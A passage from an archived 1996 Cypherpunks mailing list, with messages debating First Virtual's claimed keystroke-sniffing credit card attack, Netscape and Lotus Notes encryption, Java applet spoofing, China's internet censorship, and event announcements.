never a product. (Not a firewall, not a fancy browser, not PGP, not a gun,
not the Club, not an airbag.) FV has tried to productize their approach
(out-of-band transfer of credit card number + long clearing time for sellers
+ negligible per-unit cost for goods sold) but it won't work any better for
FV consumers than it does for anyone else who tries to buy something which
can't be sold.

It's a shame that Garfinkel didn't spend more time/column space on
suggestions or observations from the independent people he interviewed and
less time on the "hot news - Netscape security broken by a competitor"
angle. Are there really any "big money" people left who don't have formal or
informal access to someone computer/Internet savvy enough who could have
pointed out that the cardshark attack is nothing new? Yes, bad things happen
if you run bad software. A two-way link between your computer and the rest
of the world means it's possible for bad software to send your data to other
people. It's the "Prodigy reads your hard disk/Microsoft Registration Wizard
reads your hard disk" scare all over again, with "Prodigy" replaced by "evil
untraceable criminals" and "hard disk" replaced by "keystrokes". Duh. 

We should, however, learn from what FV did right - they wrote software which
(apparently) had or can have a real political effect. (It seems to have
worked on Garfinkel, anyway). Cypherpunks write code? FV wrote code and got
some attention for their otherwise unexciting message. (It seems to be a
combination of working code and good user interface - witness the cooing
over the icon indicating which type of credit card you're using and the fact
that it uninstalls itself.) It's a shame that they won't use their powers
for good instead of evil.

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Miguel Saraiva <msaraiva@marktest.pt>
Date: Thu, 1 Feb 1996 17:22:30 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Netscape encrypted email!!
Message-ID: <01BAEFC3.C50F85E0@leon.marktest.pt>
MIME-Version: 1.0
Content-Type: text/plain


I believe the new microsoft exchange (from msdn level 3 ) also has some sort of security built in. 
Haven't tried yet. (It needs (?) Exchange Server for it )

>>   * Integrated email - Netscape Navigator 2.0 offers full-featured and rich
>>     email capabilities, allowing you to both read and send secure email
>>     messages without launching an external email application.

>I downloaded it and checked it out.  But it was not clear how to use this
>secure email - so it may lack something yet in user friendlyness, or I may
>have just missed it.  Anyway, it should be much easier to use than PGP. 
>Are we all going to switch to Netscape for email?  Is anyone using this? 
>Want to tell us how? 
 
>


--                                                     --
-> Leon : Miguel Angelo Saraiva : msaraiva@marktest.pt <-
--                                                     --

   --  Vince







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 1 Feb 1996 04:01:23 +0800
To: nsb@nsb.fv.com
Subject: Re: More FUD from the Luddites at FV [pt. 2]
In-Reply-To: <v02130502ad33448ac18b@[199.2.22.120]>
Message-ID: <oR7Dx8m9L0eO085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <wl3XYbuMc50e1Ir_Ze@nsb.fv.com>,
Nathaniel Borenstein <nsb@nsb.fv.com> wrote:

> Excerpts from mail: 29-Jan-96 More FUD from the Luddites .. Douglas
> Barnes@communiti (3569*)
> 
> > Whether you're a business or an individual, having, say, your
> > hard drive wiped clean by a virus would be several orders of
> > magnitude worse than the relatively minor inconvenience of
> > having to get unauthorized items deleted from your credit card bill.
> 
> For the consumer, absolutely.
> 
> For the bank, having millions of credit cards compromised by a single
> attacker is a more serious risk.

I've read your posts; I believe I understand them, and I believe I
understand how First Virtual and other online payment systems work.

I do not believe that an attack of this nature *can* yield millions of
credit cards -- unless the attacker is Bill Gates or Marc Andreesen
(and they have less risky ways of making lots of money).

The degree to which the attack you describe is a threat to online
commerce depends critically on the degree to which viruses and Trojan
horse programs can propagate through their potential base of platforms. 
Virii *do* propagate, we know, and someone who reads Cypherpunks surely
has the information on hand to say how well they propagate, given
connectivity on the Internet on the one hand and widespread antivirus
software on the other.  My guess is that overall, the infection rate
even by well-known virii such as Michaelangelo, is pretty low.  Only a
fraction of infected machines are going to be used for buying things
over the Internet.

As for Trojan horses, their penetration depends on how widely used they
are.  If one posted PAMELA ANDERSON STRIP POKER!!!1! to
alt.binaries.pictures.erotica, how many copies would be downloaded and
installed?   How many users would also be online shoppers?

The only way millions of credit cards would be at risk would be if the
Trojan horse were installed on millions of Internet-connected machines
 -- it would have to be a very widely used Trojan horse, something as
widely used as Win95, or Netscape.  I believe that a person who can get
that kind of distribution of their software has less risky and more
fruitful ways of making money than stealing credit card numbers.

In short, I believe that the risk to the credit card business of this
attack is *at most* no greater than Xriva Zvgavpx'f (*) hack of 20,000
credit cards from Netcom, and very likely far, far smaller.  "Millions"
is an absurd and dishonest exaggeration.  You should be ashamed of
yourself. 

(*) Overused and overhyped name rot13ed to protect the delicate
sensibilities of the Cypherpunks.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMQ+8gOVevBgtmhnpAQEuzQL9H8EHegrTdPSAe5nIM9eO9n4+xJR7SUrF
Q1EWVIrM1tMILc02zwI5Qe3AoE0Bj+G7kBkuICZyoTjObm5sVAEF+dMhF25joGXI
ztKwPUr3XLWRrX2PNj+V9zNWZxRHLJK2
=tX+9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman/Iris.IRIS@iris.com
Date: Thu, 1 Feb 1996 00:27:42 +0800
To: CypherPunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <9601311850.AA1379@moe.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 11:09 1/30/96, Charlie_Kaufman/Iris.IRIS@iris.com wrote:
> 
> >p.s. re: the fact that it's 64 bits rather than 128. That was the limit on 
key
> >size of the crypto software we licensed from a third party. That crypto
> >software also limited us to 760 bit RSA keys.
> 
> I find this very interesting. RSA prohibits its licencees from using RSA
> software with truly secure keylenghts. What may have incenitvised them to
> take this bizzare position?

The problem is not with the license, but with the software. And not with the 
latest software, but with some antique software we started using a long time 
ago (before RSAREF was a twinkle in anyone's eye) when 760 bit RSA keys and 64 
bit RC2/RC4 keys seemed impenetrable. Given that interoperability with the 
installed base is a higher priority than resistance to some theoretical attack, 
we can't increase key sizes until the market rolls over to the latest software. 
We do have plans to get there.

  --Charlie Kaufman
  (charlie_kaufman@iris.com)
  PGP fingerprint: 29 6F 4B E2 56 FF 36 2F   AB 49 DF DF B9 4C BE E1





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 1 Feb 1996 18:58:39 +0800
To: Brian D Williams <talon57@well.com>
Subject: Re: Two bits, Four Bits, ETC
In-Reply-To: <199601301853.KAA13801@well.com>
Message-ID: <199601311558.KAA05088@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Brian D Williams writes:
> Excellent point Bill! Lets not forget that IBM owns Lotus Notes, be
> sure to include that in your bashing. They caved in on Lucifer
> after all. ;)

Lucifer isn't stronger than DES, so it wasn't a cave in. An
understanding of differential cryptanalysis makes all the
difference...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 1 Feb 1996 16:50:12 +0800
To: tcmay@got.net
Subject: NOISE: Re: The FV Problem = A Press Problem
In-Reply-To: <ad33b5f134021004e5fb@[205.199.118.202]>
Message-ID: <I47Dx8m9L0RK085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ad33b5f134021004e5fb@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> Interesting term, similar to Chomsky's "Manufacturing Consent" (which
> obviously must've come later...).

Wow, that was fast!  Only two days in the FV FUD flamewar, and already
someone said "Chomsky".

Alan "Still holding out for 'Hitler'" Bostick

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMQ++kOVevBgtmhnpAQExSgL9FmliH59XZQdJYtSg1Ysfh2q80N8fjkuB
HEAbSdf24I6m4mcaIVJPq2El/nCnrGazImBWjt85bjnNLr1w7nEafW7PTPXeU4hH
NQpB6rPz1gaZC9LmWTSIULU8qYcSNgBn
=6F2e
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Thu, 1 Feb 1996 00:59:18 +0800
To: cypherpunks@toad.com
Subject: Re:  Fooling people with Java applets
Message-ID: <199601311630.KAA02621@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


On Monday,  29 Jan 1996 Benjamin Renaud wrote

:All graphical UI elements spawed by an applet, which are the only ones
:that can get user events, are clearly marked as "untrusted applet
:window"s.

:So unless you type your password in a pop-up marked "untrusted applet
:window", you should be fine. And if you do, you arguably deserve
:whatever happens to you....

As sad as it sounds, I actually had this happen.  Some shmuck put in sensitive 
information into a window clearly maked "Untrusted Java Applet"

Unfortunatly, the smuck was a Sr. Vice President, so what can you do.
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Simon McAuliffe" <sai@comp.vuw.ac.nz>
Date: Fri, 2 Feb 1996 00:16:41 +0800
To: cypherpunks@toad.com
Subject: Re: Apology and clarification
Message-ID: <199601302254.LAA00347@caesar.sans.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


For those that are sick of this thread (as I am), I apologize in
advance for throwing another log on the fire.  I just can't help 
trying to get through...

Nathaniel Borenstein <nsb@nsb.fv.com> writes:

> First of all, I believe that I owe the cypherpunk community an
> apology for an error in judgement on my part.  The message that I
[...]
> Our approach combines the following four known problems into a
> fatal attack:
> 
>   1) Consumer machines are insecure and easily compromised.
>   2) Keyboard sniffers are easy to write.
>   3) Credit card numbers are self-identifying (they have check digits) 
>      and can easily be extracted from a huge stream of input data.
>   4) Once intercepted, small amounts of information (e.g. a cc #)
>      may be distributed completely tracelessly over the Internet.
> 
> When you put all four of these together, you have an attack that
> IS new, in the sense that nobody we know of has ever mentioned it
> before, and which could in fact be used by a single criminal, with
> only a few weeks of programming, to tracelessly steal MILLIONS of
> credit cards, if software-encrypted credit-card schemes ever caught
> on.

You're right, the four problems you mention are known and have been
for a long time, and have also been used in attacks.  What you don't
seem to understand is that the overall attack from the combination of
these isn't new either.

In many ways a credit card number, name and expiry date form a
password.  It's a password that the bank accepts to allow money
transfers in much the same way as a computer accepts a password to 
allow information transfers.

On this very list (amongst other places), there has been discussion
of trojans and viruses for grabbing passwords, and of methods of
determining what is a password and what isn't a password.  In the
same way you can decide if a number is a credit card number, there
are heuristics you can use to determine if a user is entering a
password, though often it may require more than just monitoring
keystrokes.  To collect expiry dates and names for credit cards,
monitoring additional side information may also be useful.  So I
see no fundamental difference between the two, credit card numbers
_are_ passwords.

I myself have used precisely this technique many years ago, as I'm 
sure many others here have, to demonstrate security problems.  The 
only difference is the heuristic for determining what constitutes a 
password in the domain you're snooping.

What's more, the methods in existence before your post can be and
have been built in viruses which are considerably more prolific than
a trojan.  Not only is your attack not new, it is less powerful that
some similar attacks that predated yours.

Implying credit card numbers are more valuable than passwords is
dubious.  There are organisations that could lose millions of dollars
if their password security was compromised, but it's hard to say the
same for credit cards.  In this country, although I don't know about
yours, I'm not even liable if somebody steals my credit card and uses
it.  I would consider a "credit card password" as a lesser commodity
than a password for giving access to an entire computer system.

[...]
> So here's the factual claim, to be proven or disproven:  One good
> programmer, in less than a month, can write a program that will
> spread itself around the net, collect an unlimited number of credit
> card numbers, and get them back to the program's author by
> non-traceable mechanisms.  Does anyone on this list doubt that
> this is true?  If so, I'd like to know the flaw in my thinking, --
> I am *not* too proud to withdraw any claims that aren't true.  If
> not, I think it's worth noting that this fact was previously
> completely unknown to the bankers and businessmen who are putting
> large sums of money at risk on the net.  The only way to get the
> message to those communities is with a very visible public
> announcement of the kind you saw yesterday.

Of course this is a threat, I don't think _anybody_ will deny that,
but this is not a new threat.  True, the attack may not have been
known to businesspeople and bankers, but there are many others areas
of security they also know nothing about.  Trying to claim an old
invention as your own just looks like hype, PR and lies, not to
mention showing a lack of knowledge which could do the reverse from
what you set out to achieve.

It is certainly a Good Thing for the public to know about the
potential for various types of snooping, but surely it could be done
in some way which doesn't make it look like you invented it.  I
don't think anybody here objects to the attack itself, but rather
the claims you made about it and the way you communicated it.

---
E-mail: sai@comp.vuw.ac.nz/sai@kauri.vuw.ac.nz     +64 4 233 9427
PGP Fingerprint: 65 5B B4 6C CB 6A 65 F1  01 91 B9 FE 34 23 99 D3
PGP Key by mail, finger or from http://www.vuw.ac.nz/~sai/pgp-key.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 1 Feb 1996 23:49:20 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601311713.MAA12059@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQ+jNCoZzwIn1bdtAQEgAwF+LRiwIlumqj6P2/pft8804Cbbttz3R7yL
Pwd44+uUTk1SxJZePCt7O1jReYfDohTB
=Ii6p
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 1 Feb 1996 02:12:32 +0800
To: www-buyinfo@allegra.att.com
Subject: DCSB: Digital Commerce: Living Room ExIm, Retail Replacement, or Mail-Order Redux?
Message-ID: <v02120d1bad35550babef@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                             Fred Hapgood

                   Digital Commerce: Living Room ExIm,
                 Retail Replacement, or Mail-Order Redux?


                        Tuesday, February 6, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Fred says:

>So far Web commerce has largely been a speciality export story.
>(www.activmedia.com says that web commerce is half exports.) This
>reflects the obvious strengths of the medium: webstores are
>globally accessible and can support information resources to any
>depth customers require.
>
>However, the meat and potatoes of the $2 trillion American retail
>market lie not in specialty exports but in geographically
>structured markets built on access to local traffic and
>characterized by low-information transactions.  If web commerce
>has no role to play in commerce on this level, it will end up
>little more than an extension and enhancement of direct mail.
>(Which is of course not to be dismissed entirely: direct mail did
>$55 billion last year.)
>
>My talk will address the compatibility of these segments with the
>web, now and later.


Fred Hapgood has written on internet commerce for _CIO_ and
_Webmaster_ magazines.  He has written on associated subjects for
_Wired_ and _Inc-Technology_.  The February talk will be based on
research for an article on the web and franchising.



This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, February 6, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, February 2 , or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 February    Fred Hapgood     Freelance Author
 March       Glenda Barnes    X.9 Electronic Commerce Security Group
 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC
 July        Pete Loshin      Author, "Electronic Commerce"

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ+lMfgyLN8bw6ZVAQEvBgP/QTk2QLDFYJ3LFgb6N3tz2wZC5nDTBYdb
qK1QQky2JbG4LEgONIg8JunfbAM1+8x07nf03TrVEcHmGUnA81IiH3uqodeMjmqp
6BZqoOR37Eg0vm8mOIhuJJdiRezgRV0OZ81vmFpVzIcoKwDUsdNgv+8EB34mxq5/
jsc1RvHOWuw=
=8aTM
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 1 Feb 1996 02:18:43 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601311747.MAA12194@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQ+rOyoZzwIn1bdtAQHQ4gF/bRVU55UgyzRazGCU0ztKZVtZTN2BrBAR
RUSsleMUXuCfFXwDvLKbMfFZdzjJNdTj
=peMJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 1 Feb 1996 12:05:13 +0800
To: cypherpunks@toad.com
Subject: RE: No FV supporters?
Message-ID: <9601311805.AA21087@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> if people like Sameer and Rich Salz (e.g., who have reputations
> as knowledgeable and aware) are going to trash FV

Thanks for the compliment.  I never trashed FV or its protocols, as I
don't know anything about them.  I did comment on some of the principles of
their principals, however, as this whole brou-ha-ha strikes me as a
continuing slide to technical-intellectual dishonesty.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 04:12:41 +0800
To: cypherpunks@toad.com
Subject: Chomsky
Message-ID: <ad3506ce430210040bcb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:07 PM 1/31/96, Alan Bostick wrote:

>In article <ad33b5f134021004e5fb@[205.199.118.202]>,
>tcmay@got.net (Timothy C. May) wrote:
>
>> Interesting term, similar to Chomsky's "Manufacturing Consent" (which
>> obviously must've come later...).
>
>Wow, that was fast!  Only two days in the FV FUD flamewar, and already
>someone said "Chomsky".
>
>Alan "Still holding out for 'Hitler'" Bostick


What's the big deal about mentioning Chomsky?

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 1 Feb 1996 11:09:45 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601311815.NAA12336@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQ+x2ioZzwIn1bdtAQFLvgGArC5EiVmF0J6VZSZnboc9yoTW3eiJXN1M
4L9v0f1tkuoJlC10gX6fRo3SW19vILT4
=LmRK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 1 Feb 1996 03:47:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <9601301545.AA07088@alpha>
Message-ID: <9601311919.AA17260@alpha>
MIME-Version: 1.0
Content-Type: text/plain



futplex@pseudonym.com writes:
 > I believe the work on authenticating applet servers to client in terms of
 > signed Java classes, etc. is the most promising long-term approach.

Sure.  And it's also important to keep in mind that everyday some
dimwit falls prey to the pigeon drop or some other "meat-to-meat"
scam.  It'll take a few years for people to get used to security
concerns on the net, just like it took a few years for people to
figure out that you really would die if you drove your new Model T
like a maniac.

 > ObNSB: Although I seem to be cast as an opponent of Java adoption in this
 > thread, I'm actually a fan of Java and expect to write some Java code RSN. 

Me too.  There are so many "but can Java do that?" questions floating
around in all sorts of bizarre contexts that it's easy to lose sight
of all the nice things about a nifty interpreted language.

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 1 Feb 1996 03:27:16 +0800
To: cypherpunks@toad.com
Subject: FYR_wal
Message-ID: <199601311819.NAA23434@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-31-96. WSJ:

   "Chinese Firewall: Beijing Seeks to Build Version of the
   Internet That Can Be Censored."

      "We've eliminated what is undesirable and kept what is
      good." Which is, succinctly, China's riposte to the
      information age, from satellite television and real-time
      news to the Internet. Beijing eagerly seeks the fanciest
      information hardware, but it fears much of the software.

      China, in short, is determined to do what conventional
      wisdom suggests is impossible: Join the information age
      while restricting access to information. The reason: If
      the Internet has proved its utility, it has also become
      a fluid medium for the two things China's authoritarian
      government most dreads, political dissent and
      pornography.

      Industry insiders say China -- which has already bought
      some of the most powerful equipment available, from
      U.S.-based Cisco Systems Inc. and Sprint International,
      a unit of Sprint Corp. -- ultimately aims to create a
      monolithic Internet backbone, centrally administered,
      that minimizes the threat posed by the Internet's
      amoeba-like structure.

   FYR_wal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Minter <cminter@mipos2.intel.com>
Date: Thu, 1 Feb 1996 05:54:36 +0800
To: jya@pipeline.com (John Young)
Subject: Re: FYR_wal
In-Reply-To: <199601311819.NAA23434@pipe1.nyc.pipeline.com>
Message-ID: <199601312123.QAA15096@zws388.sc.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


>    "Chinese Firewall: Beijing Seeks to Build Version of the
>    Internet That Can Be Censored."
> 
>       "We've eliminated what is undesirable and kept what is
>       good." Which is, succinctly, China's riposte to the
>       information age, from satellite television and real-time
>       news to the Internet.

ok, who wants to help me market my new tunneling router software 
called "Chinese Firedrill".  I believe it would sell well in China's
black market.

-- 
______________________________________________________________________
Corey Minter | cminter@mipos2.intel.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 1 Feb 1996 03:29:45 +0800
To: cypherpunks@toad.com
Subject: PoM 4: Anti-Government Growth
Message-ID: <199601311829.NAA24863@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Today's fourth article of The Washington Post series on "The
   Politics of Mistrust" is:

   "Public Grows More Receptive to Anti-Government Message."

     The public sees the quality of life deteriorating or not
     improving from the 1960s, with family breakup, increased
     violence, a failure to produce better jobs, and, in 
addition,
     with the Cold War over, they don't see any real reduction 
in
     the risks of the possibility of a third world war. All 
this
     occurs at a time when taxes have been increasing. The 
small
     government, low tax environment creates a real opportunity 
for
     Republicans.... The general force of this sense of no 
progress
     is to favor the more conservative party.

   Next: Generation divide

   Series to date available at:

      http://www.replay.com/young/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Thu, 1 Feb 1996 06:47:36 +0800
To: cypherpunks@toad.com
Subject: Re: Two Bits Four Bits ETC
Message-ID: <199601312202.OAA12349@well.com>
MIME-Version: 1.0
Content-Type: text/plain



>>Brian D Williams writes:
>>Excellent point Bill! Lets not forget that IBM owns Lotus Notes,
>>be sure to include that in your bashing. They caved in on Lucifer
>>after all. ;)

>"Perry E Metzger" <perry@piermont.com> adds:
>Lucifer isn't stronger than DES, so it wasn't a cave in. An
>understanding of differential cryptanalysis makes all the
>difference...

True, I was refering to them halving the original key length.

Brian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Thu, 1 Feb 1996 14:26:01 +0800
To: Peter Monta <cypherpunks@toad.com
Subject: Re: Crypto-smart-card startup Inside Technologies
In-Reply-To: <199601310830.AAA06778@mage.qualcomm.com>
Message-ID: <MAPI.Id.0016.00617269206c61693631383730313144@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain


>There's an article in the January 29 _EE Times_ about a French
>cryptographic-smart-card startup called Inside Technologies.
>Tidbits:

I find it in a way amusing that a country which
have very weird attitude towards use of crypto
(it is not allowed to be used) tries to set 
standards and provide new technology. If they
are that opposing to use of strong encryption
how on earth they can be providing it to others
and get those others to believe there is no
catch in it?

Maybe it is the difference in internal and
foreign policies but still I suppose a country is 
supposed to be spying or sorry gather information
on other countries not on their own people and
companies.

Just wondering...


Kari Laine







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven C. Perkins" <sperkins@andromeda.rutgers.edu>
Date: Thu, 1 Feb 1996 04:27:14 +0800
To: cyberia-l@warthog.cc.wm.edu
Subject: Afternoon Conference: UCC 2B: Information Contracts
Message-ID: <1.5.4b11.16.19960131195725.5bbfb622@andromeda.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excuse x-posting.  Please forward to appropriate lists.

-----------------------------------------------------------------------

February 14 -- 1:30-4:30 PM -- UCC Article 2B: Information Contracts 


Rutgers School of Law-Newark and the New Jersey State Bar Association will
co-sponsor a program to introduce lawyers, business, and others to the
current draft of new Article 2B of the Uniform Commercial Code, Digital
Electronic Information and its Transfer. Professor Raymond T. Nimmer,
University of Houston and the Uniform Laws Commission Drafting Committee
Reporter, and two members of the Committee, Professor David A. Rice of
Rutgers School of Law-Newark and Professor Amy Boss of Temple University
School of Law, will present the draft, seek comments, and respond to
questions. Other panelists include Donald Cohn, Esq. of DuPont Corporation,
Co-Chair of the ABA Software Contract Law Task Force and Holly Towle, Esq.
of the Seattle law firm of Preston Gates & Ellis. 

This program is free; however, there is limited seating available. Please
call Assistant Dean Margaret C. Bridge at 201/648-5968 to reserve seating.

RELATED CONFERENCE: COPYRIGHT  ISSUES  AND  THE  NATIONAL  INFORMATION
INFRASTRUCTURE - February 15, 1996.  Please see the Conference home page at
URL:"html://www.rutgers.edu/RUSLN/copyconf.html".

-----------------------------------------------------------------------

February 14, 1996
                                                UCC 2B    
                                REGISTRATION  DEADLINE: February 10, 1996
                          (Walk-in registration permitted beginning at 8:30AM)

Number Attending: ________

Name(s)_____________________________________________________________________
________

Affiliation_________________________________________________________________
___________

Address _______________________________ City _________________  State _____
Zip _________

Telephone (_____)__________________


       Mail to:   Rutgers School of Law-Newark
                  15 Washington Street
                  Newark, NJ 07102-3192
            Attn: Assistant Dean Margaret C. Bridge


For further information, call Assistant Dean Margaret C. Bridge at (201)
648-5094, or send email to Professor David A. Rice at drice@world.std.com.
----------------------------------------------------------------------------
--------

**********||||||||||\\\\\\\\\\*//////////||||||||||**********
Steven C. Perkins              sperkins@andromeda.rutgers.edu
User Services Coordinator
Ackerson Law Library    http://www.rutgers.edu/lawschool.html
Rutgers, The State University of New Jersey,
School of Law at Newark 
                   http://www.rutgers.edu/RUSLN/rulnindx.html
              VOX: 201-648-5965 FAX: 201-648-1356                        
|||||||||||||||\\\\\\\\\\\\\||*||///////////////|||||||||||||||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 1 Feb 1996 07:51:47 +0800
To: Corey Minter <cminter@mipos2.intel.com>
Subject: [NOISE] Re: FYR_wal
Message-ID: <v03004a01ad35992794f5@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


>ok, who wants to help me market my new tunneling router software
>called "Chinese Firedrill".  I believe it would sell well in China's
>black market.
>

Shouldn't it be called:
    "The Great Firewall of China"? ;-)


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven C. Perkins" <sperkins@andromeda.rutgers.edu>
